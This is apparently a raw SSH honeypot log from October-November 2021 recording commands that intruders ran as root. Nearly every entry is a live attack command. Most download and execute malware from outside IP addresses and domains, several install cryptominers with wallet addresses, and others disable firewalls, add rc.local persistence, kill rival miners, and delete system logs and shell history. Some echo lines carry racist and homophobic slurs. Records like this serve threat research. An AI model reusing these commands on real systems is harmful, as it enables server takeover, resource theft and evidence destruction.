Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Payloaded; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo Payloaded
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 157.245.77.248 22-Oct-2021 18:25:10 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://54.37.79.0/0x83911d24Fx.sh; curl -O http://54.37.79.0/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 54.37.79.0 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 54.37.79.0; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 54.37.79.0 0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://54.37.79.0/0x83911d24Fx.sh
curl -O http://54.37.79.0/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 54.37.79.0 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 54.37.79.0
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 54.37.79.0 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 139.59.144.149 23-Oct-2021 03:22:32 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 209.141.40.64 23-Oct-2021 12:18:01 ssh2 root
Exec wget hugecockinsideyourmom.store/x86_64; chmod 777 *; ./x86_64 drip_payload
wget hugecockinsideyourmom.store/x86_64
chmod 777 *
./x86_64 drip_payload

From 206.189.3.2 23-Oct-2021 13:01:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.208.197.236/0x83911d24Fx.sh; curl -O http://91.208.197.236/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 91.208.197.236  -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 91.208.197.236 ; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236  0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://91.208.197.236/0x83911d24Fx.sh
curl -O http://91.208.197.236/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 91.208.197.236 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 91.208.197.236
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 165.227.143.12 23-Oct-2021 22:24:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.208.197.236/0x83911d24Fx.sh; curl -O http://91.208.197.236/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 91.208.197.236  -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 91.208.197.236 ; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236  0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://91.208.197.236/0x83911d24Fx.sh
curl -O http://91.208.197.236/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 91.208.197.236 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 91.208.197.236
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 45.61.185.168 24-Oct-2021 01:04:59 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49fJJBi8TxsGB8KB4WCg2ZWNtQNCvAMB4HYkwS31HfVWJwvx5xQw3rpYx7M635ew5TZy4YK5HkLVoJCdE2X57LQiGfy6SgF
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49fJJBi8TxsGB8KB4WCg2ZWNtQNCvAMB4HYkwS31HfVWJwvx5xQw3rpYx7M635ew5TZy4YK5HkLVoJCdE2X57LQiGfy6SgF

From 209.141.59.77 24-Oct-2021 14:11:17 ssh2 root
Exec wget hugecockinsideyourmom.store/x86_64; wget hugecockinsideyourmom.store/i686; wget hugecockinsideyourmom.store/arm; wget hugecockinsideyourmom.store/arc; wget hugecockinsideyourmom.store/arm5; wget hugecockinsideyourmom.store/arm6; wget hugecockinsideyourmom.store/arm7; wget hugecockinsideyourmom.store/i586; wget hugecockinsideyourmom.store/mips; wget hugecockinsideyourmom.store/mipsel; wget hugecockinsideyourmom.store/sh4; chmod 777 *; ./arc drip_payload; ./arm drip_payload; ./arm5 drip_payload; ./arm6 drip_payload; ./arm7 drip_payload; ./i586 drip_payload; ./i686 drip_payload; ./mips drip_payload; ./mipsel drip_payload; ./sh4 drip_payload; ./x86_64 drip_payload;
wget hugecockinsideyourmom.store/x86_64
wget hugecockinsideyourmom.store/i686
wget hugecockinsideyourmom.store/arm
wget hugecockinsideyourmom.store/arc
wget hugecockinsideyourmom.store/arm5
wget hugecockinsideyourmom.store/arm6
wget hugecockinsideyourmom.store/arm7
wget hugecockinsideyourmom.store/i586
wget hugecockinsideyourmom.store/mips
wget hugecockinsideyourmom.store/mipsel
wget hugecockinsideyourmom.store/sh4
chmod 777 *
./arc drip_payload
./arm drip_payload
./arm5 drip_payload
./arm6 drip_payload
./arm7 drip_payload
./i586 drip_payload
./i686 drip_payload
./mips drip_payload
./mipsel drip_payload
./sh4 drip_payload
./x86_64 drip_payload

From 195.133.18.116 24-Oct-2021 16:05:40 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://195.133.18.116/lewdbins.sh; chmod 777 lewdbins.sh; sh lewdbins.sh; tftp 195.133.18.116 -c get lewdtftp1.sh; chmod 777 lewdtftp1.sh; sh lewdtftp1.sh; tftp -r lewdtftp2.sh -g 195.133.18.116; chmod 777 lewdtftp2.sh; sh lewdtftp2.sh; rm -rf lewdbins.sh lewdtftp1.sh lewdtftp2.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://195.133.18.116/lewdbins.sh
chmod 777 lewdbins.sh
sh lewdbins.sh
tftp 195.133.18.116 -c get lewdtftp1.sh
chmod 777 lewdtftp1.sh
sh lewdtftp1.sh
tftp -r lewdtftp2.sh -g 195.133.18.116
chmod 777 lewdtftp2.sh
sh lewdtftp2.sh
rm -rf lewdbins.sh lewdtftp1.sh lewdtftp2.sh
rm -rf *

From 205.185.119.4 25-Oct-2021 16:07:11 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 154.28.2.4 25-Oct-2021 20:30:23 ssh2 root
w
ps a-eaf
ps a-ef
ps a-ef
ps a-ef
ps -aef
ls -a /ho
ls -a /home
unset HISTFILE
unset HISTSAVE
unset HISTZONE
unset HISTORY
history -c
wget 185.51.10.233/mig
chmod 755 mig
./mig -u root
rm -rf mig
cat .bash_history
w
MUIE MA-TII
ip a|grep glo

From 205.185.119.4 26-Oct-2021 05:45:12 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 179.43.175.26 26-Oct-2021 07:54:42 ssh2 root
Exec pkill ip; pkill xmrig; pkill Opera; pkill x86; pkill docker; pkill java; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill ip
pkill xmrig
pkill Opera
pkill x86
pkill docker
pkill java
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 205.185.120.183 26-Oct-2021 11:42:06 ssh2 root
Exec wget 194.85.249.85/x86_64; wget 194.85.249.85/i686; wget 194.85.249.85/arm; wget 194.85.249.85/arc; wget 194.85.249.85/arm5; wget 194.85.249.85/arm6; wget 194.85.249.85/arm7; wget 194.85.249.85/i586; wget 194.85.249.85/mips; wget 194.85.249.85/mipsel; wget 194.85.249.85/sh4; chmod 777 *; ./arc drip_payload; ./arm drip_payload; ./arm5 drip_payload; ./arm6 drip_payload; ./arm7 drip_payload; ./i586 drip_payload; ./i686 drip_payload; ./mips drip_payload; ./mipsel drip_payload; ./sh4 drip_payload; ./x86_64 drip_payload;
wget 194.85.249.85/x86_64
wget 194.85.249.85/i686
wget 194.85.249.85/arm
wget 194.85.249.85/arc
wget 194.85.249.85/arm5
wget 194.85.249.85/arm6
wget 194.85.249.85/arm7
wget 194.85.249.85/i586
wget 194.85.249.85/mips
wget 194.85.249.85/mipsel
wget 194.85.249.85/sh4
chmod 777 *
./arc drip_payload
./arm drip_payload
./arm5 drip_payload
./arm6 drip_payload
./arm7 drip_payload
./i586 drip_payload
./i686 drip_payload
./mips drip_payload
./mipsel drip_payload
./sh4 drip_payload
./x86_64 drip_payload

From 209.141.36.13 26-Oct-2021 16:29:33 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86
echo hraztalag on top niggers, Molov is a fag

From 45.61.185.168 27-Oct-2021 09:13:17 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 209.141.59.184 27-Oct-2021 10:14:03 ssh2 root
Exec cd /tmp; rm -rf *; pkill xms; pkill x86_64; pkill x86; pkill cnrig; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; busybox wget http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 rootsbabe
cd /tmp
rm -rf *
pkill xms
pkill x86_64
pkill x86
pkill cnrig
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
busybox wget http://188.213.49.155/x86_64
chmod 777 *
./x86_64 rootsbabe

From 179.43.175.26 27-Oct-2021 16:39:25 ssh2 root
Exec pkill ip; pkill xmrig; pkill Opera; pkill x86; pkill docker; pkill java; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
pkill ip
pkill xmrig
pkill Opera
pkill x86
pkill docker
pkill java
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 209.141.42.29 28-Oct-2021 05:45:14 ssh2 root
Exec cd /tmp; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 giftsfromthegod
cd /tmp
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
chmod 777 *
./x86_64 giftsfromthegod

From 209.141.33.121 28-Oct-2021 23:40:12 ssh2 root
Exec cd /tmp; rm -rf *; pkill xms; pkill cnrig; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; busybox wget http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 rootsbabe
cd /tmp
rm -rf *
pkill xms
pkill cnrig
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
busybox wget http://188.213.49.155/x86_64
chmod 777 *
./x86_64 rootsbabe

From 198.98.54.17 29-Oct-2021 14:25:30 ssh2 root
Exec wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; chmod 777 *; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 180.215.108.229 30-Oct-2021 03:18:22 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.203.28:8003/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.67.203.28:8003/TI
chmod 777 TI
./TI
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.203.28:8003/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.67.203.28:8003/TI
chmod 777 TI
./TI

From 180.215.108.229 30-Oct-2021 03:52:00 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.49.248/sora.sh; curl -O http://209.141.49.248/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 209.141.49.248 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 209.141.49.248; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.49.248/sora.sh
curl -O http://209.141.49.248/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 209.141.49.248 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 209.141.49.248
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.49.248/sora.sh; curl -O http://209.141.49.248/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 209.141.49.248 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 209.141.49.248; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.49.248/sora.sh
curl -O http://209.141.49.248/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 209.141.49.248 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 209.141.49.248
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 180.215.108.229 30-Oct-2021 04:54:47 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.49.248/sora.sh; curl -O http://209.141.49.248/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 209.141.49.248 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 209.141.49.248; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.49.248/sora.sh
curl -O http://209.141.49.248/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 209.141.49.248 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 209.141.49.248
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 205.185.126.71 30-Oct-2021 12:21:39 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X

From 176.111.173.218 30-Oct-2021 12:24:20 ssh2 root
Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ;  touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r 
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /var/log/wtmp
rm -rf /var/log/lastlog
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
rm -rf /root/.bash_history
touch /root/.bash_history
history -r

From 154.28.2.4 30-Oct-2021 16:29:28 ssh2 root
w
curl ipv4.icanhazip.com
apt
wget
apt install curl
apt install curl install curl curl|| install curl install curl curl|| curl install curl curl||l install curl install curl curl|| install curl install curl curl|| curl install curl curl||l curl install
curl ipv4.icanhazip.com
wget
wget -qO - ipv4.icanhazip.com
ls -a /ho
ls -a /home
ls -a
pwd
cat .bash_history
cat network.pl
w
ip a|grep glo
last -20
cat /et hosts
cat /etc/hosts
w
nproc

From 157.230.104.41 30-Oct-2021 18:21:24 ssh2 root
Exec w
w

From 209.141.33.121 31-Oct-2021 01:45:15 ssh2 root
Exec cd /tmp; rm -rf *; pkill xms; pkill cnrig; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; busybox wget http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 rootsbabe
cd /tmp
rm -rf *
pkill xms
pkill cnrig
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
busybox wget http://188.213.49.155/x86_64
chmod 777 *
./x86_64 rootsbabe

From 211.22.65.18 31-Oct-2021 10:37:14 ssh2 root
Exec uname -a;wget ftp://cpa:cpa@5.45.119.175/znoki.jpg ; perl znoki.jpg ; rm -rf zn* ; history -c
uname -a
wget ftp://cpa:cpa@5.45.119.175/znoki.jpg
perl znoki.jpg
rm -rf zn*
history -c

From 198.98.62.96 31-Oct-2021 18:09:59 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://198.98.62.92/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://198.98.62.92/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 199.195.254.63 31-Oct-2021 19:21:42 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://198.98.62.92/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://198.98.62.92/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 209.141.42.29 1-Nov-2021 14:16:39 ssh2 root
Exec cd /tmp; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 giftsfromthegod
cd /tmp
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
chmod 777 *
./x86_64 giftsfromthegod

From 107.189.30.134 1-Nov-2021 21:33:05 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64

From 205.185.126.71 2-Nov-2021 07:53:02 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 119.28.142.230 2-Nov-2021 12:01:33 ssh2 root
bt

From 205.185.115.39 2-Nov-2021 12:14:10 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like ( goofy ) 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like ( goofy )

From 104.194.219.85 2-Nov-2021 18:38:56 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like goofy  
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 222.186.133.167 3-Nov-2021 02:05:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8999/wsnbb;chmod 777 wsnbb;./wsnbb;echo "cd /tmp/">>/etc/rc.local;echo "./wsnbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8999/wsnbb
chmod 777 wsnbb
./wsnbb
echo "cd /tmp/">>/etc/rc.local
echo "./wsnbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8999/wsnbb;chmod 777 wsnbb;./wsnbb;echo "cd /tmp/">>/etc/rc.local;echo "./wsnbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8999/wsnbb
chmod 777 wsnbb
./wsnbb
echo "cd /tmp/">>/etc/rc.local
echo "./wsnbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 180.215.108.229 3-Nov-2021 03:10:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/TI
chmod 777 TI
./TI
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/TI
chmod 777 TI
./TI

From 199.19.224.231 3-Nov-2021 08:08:29 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like  goofy 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 176.111.173.218 3-Nov-2021 21:21:07 ssh2 root
Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ;  touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r 
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /var/log/wtmp
rm -rf /var/log/lastlog
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
rm -rf /root/.bash_history
touch /root/.bash_history
history -r

